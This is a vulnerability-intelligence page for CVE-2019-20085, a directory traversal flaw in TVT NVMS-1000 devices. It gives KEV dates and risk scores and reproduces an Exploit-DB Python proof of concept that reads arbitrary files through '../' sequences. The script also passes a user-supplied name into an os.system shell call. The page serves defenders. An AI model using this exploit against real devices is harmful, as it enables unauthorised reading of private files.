VIR Vulnerability Intelligence Relay

CVE-2019-20085

unknown KEV
Published 2021-11-03 Β· Modified 2021-11-03
πŸ’¬ Discuss on Community ✚ Propose mitigation
CVSS v3
β€”
CVSS v4 NEW
β€”
not yet in upstream
VIR risk
2.5

Description

TVT devices utilizing NVMS-1000 software contain a directory traversal vulnerability via GET /.. requests.

CISA KEV

Vendor
TVT
Product
NVMS-1000
Due date
2022-05-03

Predictions

Exploit likelihood
99%
Patch ETA
β€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β€” if you've already worked around this in production β€” publish your fix to the community-verified tier.

✚ Propose a mitigation on Community β†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-48311 webapps hardware python Β· 1 KB
Mohin Paramasivam Β· 2020-04-13

TVT NVMS 1000 - Directory Traversal

python exploit Source: Exploit-DB 
# Exploit Title: TVT NVMS 1000 - Directory Traversal 
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan TΓΌrle
# CVE : CVE-2019-20085

import sys
import requests
import os
import time

if len(sys.argv) !=4:
	print "  "
	print "Usage : python exploit.py url filename outputname"
	print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"	
	print "	"
else:


	traversal = "../../../../../../../../../../../../../"
	filename = sys.argv[2]
	url = sys.argv[1]+traversal+filename
	outputname = sys.argv[3]
	content = requests.get(url)

	if content.status_code == 200:
		
		print " "
		print "Directory Traversal Succeeded"
		time.sleep(3)
		print " "
		print "Saving Output"
		os.system("touch " + outputname)
		output_write = open(outputname,"r+")
		output_write.write(content.text)
		output_write.close()

	else:

		print "Host not vulnerable to Directory Traversal!"

Metasploit modules

auxiliary_scanner/http/tvt_nvms_traversal rank 300
TVT NVMS-1000 Directory Traversal
Source fetch failed: fetch_error β€” view the original via the link above.

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.